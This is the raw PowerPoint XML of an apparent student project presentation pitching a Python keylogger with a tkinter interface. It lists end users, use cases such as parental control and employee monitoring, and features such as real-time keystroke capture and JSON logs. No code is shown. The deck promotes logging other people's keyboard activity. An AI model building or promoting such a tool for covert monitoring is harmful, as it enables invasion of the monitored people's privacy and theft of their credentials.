              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"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Secondary Users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Researchers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Conduct studies on user behavior and typing patterns.</a:t>
            </a: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CF1E375-4B4F-38A5-EEF9-2E32B3EA4AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="381000"/>
            <a:ext cx="10591800" cy="3847207"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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Administrators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 compliance with organizational policies and investigate incidents.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Personal Use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Individuals who want to keep track of their own keyboard activity for various reasons.</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Cases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Security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Immediate alerts on suspicious activities.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Productivity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Detailed reports on keyboard usage.</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Parental Control</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Logs of all keyboard activity for review</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6200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88646" y="402414"/>
            <a:ext cx="11414707" cy="690574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SOLUTION AND ITS VALUE PROPOSITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F9D25C-F8B5-1556-AC94-268FF411EA56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2999096" y="1327420"/>
            <a:ext cx="8532747" cy="4647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Our key logger offers a robust solution to the problems identified.</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Features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Simplicity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Easy to set up and use, even for non-technical users.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Logging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Logs keystrokes in real-time, providing immediate insights.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Comprehensive Logs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Supports both JSON and text formats for detailed analysis.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User-Friendly Interface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Intuitive GUI built with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tkinter</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ensuring ease of use.</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Advantages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Efficiency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Lightweight and does not significantly impact system performance.</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64B6DE6-C52D-31E6-A72B-C6F905E5B58F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="762000"/>
            <a:ext cx="10591800" cy="3600986"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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Flexibility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Can be customized to meet specific user needs.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Security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Ensures data is logged securely, with options for encryption.</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Value Proposition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Cost-Effective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Open-source solution, reducing the need for expensive software.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Scalable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Suitable for individual use as well as large organizations.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Reliable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Consistent performance with regular updates and support.</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34509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287</TotalTime>
  <Words>1511</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>228</Paragraphs>
  <Slides>18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Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Savon</vt:lpstr>
      <vt:lpstr>Rojamani Koppaula</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>PROBLEM OVERVIEW</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SOLUTION AND ITS VALUE PROPOSITION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>THE WOW IN THE SOLUTION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MODELING</vt:lpstr>
      <vt:lpstr>CODE SNIPPET</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>RESULTS</vt:lpstr>
      <vt:lpstr>CONCLUSION</vt:lpstr>
      <vt:lpstr>Project Github Link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 N V S SAI SIRI</dc:title>
  <dc:creator>pc</dc:creator>
  <cp:lastModifiedBy>Roja Koppakula</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-13T07:21:25Z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